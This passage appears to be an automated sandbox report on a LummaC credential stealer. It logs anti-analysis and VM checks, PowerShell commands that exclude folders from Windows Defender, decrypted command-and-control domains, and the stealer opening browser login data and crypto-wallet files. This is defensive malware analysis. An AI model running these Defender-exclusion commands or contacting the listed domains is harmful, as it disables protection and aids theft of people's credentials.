Source: C:\Users\user\Desktop\file.exe TID: 7820	Thread sleep time: -594750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820	Thread sleep time: -594640s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7820	Thread sleep time: -594531s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7496	Thread sleep count: 7825 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7496	Thread sleep count: 1868 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7512	Thread sleep count: 33 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7692	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7588	Thread sleep count: 5956 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7584	Thread sleep count: 3819 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7620	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Lipras\pdf.exe TID: 7984	Thread sleep count: 1154 > 30	Jump to behavior
Source: C:\Lipras\pdf.exe TID: 8004	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Lipras\pdf.exe TID: 8004	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Lipras\pdf.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 598796	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 598574	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 598249	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 598140	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 597921	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 597812	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 597593	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 597375	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 597265	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 597046	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 596937	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 596718	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 596492	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 596388	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 596280	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 596171	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 596062	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 595953	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 595843	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 595625	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 595515	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 595296	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 595076	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 594968	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 594750	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 594640	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 594531	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: pdf.exe, 00000007.00000002.2179370603.0000000000089000.00000040.00000001.01000000.00000008.sdmp	Binary or memory string: VBoxService.exe
Source: pdf.exe, 00000007.00000002.2179370603.00000000001D4000.00000040.00000001.01000000.00000008.sdmp	Binary or memory string: ~VirtualMachineTypes
Source: file.exe, 00000000.00000002.4143418545.0000000005895000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: pdf.exe, 00000007.00000002.2179825249.000000000085A000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000002.2179825249.000000000081B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: pdf.exe, 00000007.00000002.2179370603.00000000001D4000.00000040.00000001.01000000.00000008.sdmp	Binary or memory string: ]DLL_Loader_VirtualMachine
Source: pdf.exe, 00000007.00000002.2179370603.0000000000089000.00000040.00000001.01000000.00000008.sdmp	Binary or memory string: VMWare
Source: pdf.exe, 00000007.00000002.2179370603.00000000001D4000.00000040.00000001.01000000.00000008.sdmp	Binary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
Source: pdf.exe, 00000007.00000002.2179370603.0000000000089000.00000040.00000001.01000000.00000008.sdmp	Binary or memory string: &VBoxService.exe
Source: file.exe, 00000000.00000002.4139998465.00000000006F2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Lipras\pdf.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Lipras\pdf.exe	Thread information set: HideFromDebugger			Jump to behavior

Source: C:\Lipras\pdf.exe

Code function: 7_2_00070D90 LdrInitializeThunk,

7_2_00070D90

Source: C:\Lipras\pdf.exe	Code function: 7_2_0263921D mov eax, dword ptr fs:[00000030h]		7_2_0263921D
Source: C:\Lipras\pdf.exe	Code function: 7_2_02638F38 mov eax, dword ptr fs:[00000030h]		7_2_02638F38

Source: C:\Users\user\Desktop\file.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Lipras'; Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Lipras
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Lipras'; Add-MpPreference -ExclusionPath 'C:\Users'"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Lipras	Jump to behavior

LummaC encrypted strings found

Source: pdf.exe	String found in binary or memory: servicedny.site
Source: pdf.exe	String found in binary or memory: authorisev.site
Source: pdf.exe	String found in binary or memory: faulteyotk.site
Source: pdf.exe	String found in binary or memory: dilemmadu.site
Source: pdf.exe	String found in binary or memory: contemteny.site
Source: pdf.exe	String found in binary or memory: goalyfeastz.site
Source: pdf.exe	String found in binary or memory: opposezmny.site
Source: pdf.exe	String found in binary or memory: seallysl.site
Source: pdf.exe	String found in binary or memory: ponintnykqwm.shop

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Lipras'; Add-MpPreference -ExclusionPath 'C:\Users'"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Lipras\pdf.exe "C:\Lipras\pdf.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Lipras	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Lipras\pdf.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: pdf.exe, 00000007.00000003.2111218031.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000002.2180058428.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2111335907.00000000008CB000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2111066004.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2175105603.00000000008D1000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2175040288.00000000008CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %\Windows Defender\MsMpeng.exe
Source: pdf.exe, 00000007.00000003.2101548903.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2101608351.00000000008CB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Lipras\pdf.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Found many strings related to Crypto-Wallets (likely being stolen)

Source: pdf.exe, 00000007.00000003.2052878859.00000000008B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum-LTC
Source: pdf.exe, 00000007.00000003.2101785067.00000000008B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\ElectronCash\w
Source: pdf.exe, 00000007.00000003.2052878859.00000000008B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxx Libertye
Source: pdf.exe, 00000007.00000003.2052878859.00000000008B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: pdf.exe, 00000007.00000003.2052896859.00000000008AF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3
Source: powershell.exe, 00000002.00000002.1759697438.0000000006087000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: # AutoUnlockKeyStored. Win32_EncryptableVolume::IsAutoUnlockKeyStored

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Lipras\pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
